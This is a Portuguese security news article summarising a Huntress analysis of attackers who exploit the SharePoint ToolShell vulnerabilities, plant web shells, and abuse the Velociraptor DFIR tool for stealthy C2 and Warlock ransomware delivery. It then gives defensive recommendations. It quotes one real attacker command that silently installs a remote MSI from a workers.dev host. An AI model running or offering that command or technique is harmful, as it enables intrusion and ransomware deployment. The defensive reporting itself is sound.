Hack Alerta

Velociraptor usado como canal C2 e vetor para Warlock em campanha recente

Análises mostram operadores abusando da ferramenta DFIR Velociraptor para criar canais C2 furtivos, instalar persistência via MSI e, em casos confirmados, entregar o ransomware Warlock; a cadeia de exploração inclui CVE‑2025‑49706 e CVE‑2025‑49704 em SharePoint.

Relatório de análise de incidentes descreve como operadores têm abusado da ferramenta legítima Velociraptor — uma solução DFIR — para estabelecer canais de comando e controle furtivos, movimentação lateral e a entrega do ransomware Warlock em ambientes corporativos.

Panorama da campanha

Analistas da Huntress investigaram três incidentes entre setembro e novembro que demonstraram abuso operacional de Velociraptor. Em casos confirmados, os invasores exploraram infraestruturas empresariais (incluindo vulnerabilidades em Microsoft SharePoint e WSUS) para implantar a ferramenta e manter acesso persistente, posteriormente entregando cargas como o ransomware Warlock.

Sequência de exploração

O vetor frequentemente inclui a exploração de uma cadeia de vulnerabilidades apelidada "ToolShell" no Microsoft SharePoint, onde os atacantes contornam autenticação usando CVE‑2025‑49706 via requisições POST a /_layouts/15/ToolPane.aspx e em seguida encadeiam CVE‑2025‑49704 para conseguir execução remota e instalar web shells modificando páginas padrão como start.aspx.

Com a web shell ativa, comandos para baixar e instalar Velociraptor via Windows Installer foram observados — por exemplo: msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi — registrando o agente como serviço do sistema e assegurando persistência.

Abuso e técnicas de ocultação

Os operadores demonstraram elevado nível operacional, usando túneis Cloudflare, bins assinados digitalmente e execução de comandos codificados em Base64 para reduzir detecção. Em um dos fluxos, o Velociraptor compensado foi usado para baixar Visual Studio Code e criar túneis de saída, mascarando tráfego malicioso como atividade legítima de desenvolvimento.

Impacto e implicações

Além de viabilizar movimentação lateral, o uso de uma ferramenta DFIR como Velociraptor complica a resposta: sua presença pode ser confundida com ações de investigação forense legítima, atrasando identificação de comprometimento ativo. Em incidentes investigados, a técnica foi associada à entrega efetiva do ransomware Warlock.

Recomendações

  • Monitorar e restringir instalações de ferramentas DFIR em ambientes de produção, exigindo aprovações e listas de permissões.
  • Aumentar vigilância de logs IIS e padrões anômalos em /_layouts/15/, que indicam tentativas de exploração das CVEs mencionadas.
  • Inspecionar autoruns e serviços recém‑registrados (ex.: serviços instalados por msiexec a partir de origens não confiáveis).
  • Aplicar patches e mitigação para CVE‑2025‑49706 e CVE‑2025‑49704 em Microsoft SharePoint e revisar configurações WSUS.

Limites das informações

O relatório vincula indicadores como o hostname DESKTOP‑C1N9M ao cluster Storm‑2603 em alguns incidentes, mas não entrega um conjunto amplo de IOCs públicos. As matérias também não detalham um inventário completo de vítimas por setor ou geografia.

Conclusão

O abuso de Velociraptor ilustra o risco inerente à dual‑use de ferramentas administrativas e forenses: sem um controle de uso rigoroso e monitoramento de anomalias, soluções legítimas podem transformar‑se em canais de C2 e plataformas para entrega de ransomware. Organizações devem equilibrar acesso a ferramentas DFIR com controles de segurança e auditoria contínua.


Baseado em publicação original de Cyber Security News
Publicado pela Redação Hack Alerta com base em fontes externas citadas e monitoramento editorial do Hack Alerta. Para decisões técnicas, operacionais ou jurídicas, confirme sempre os detalhes na fonte original.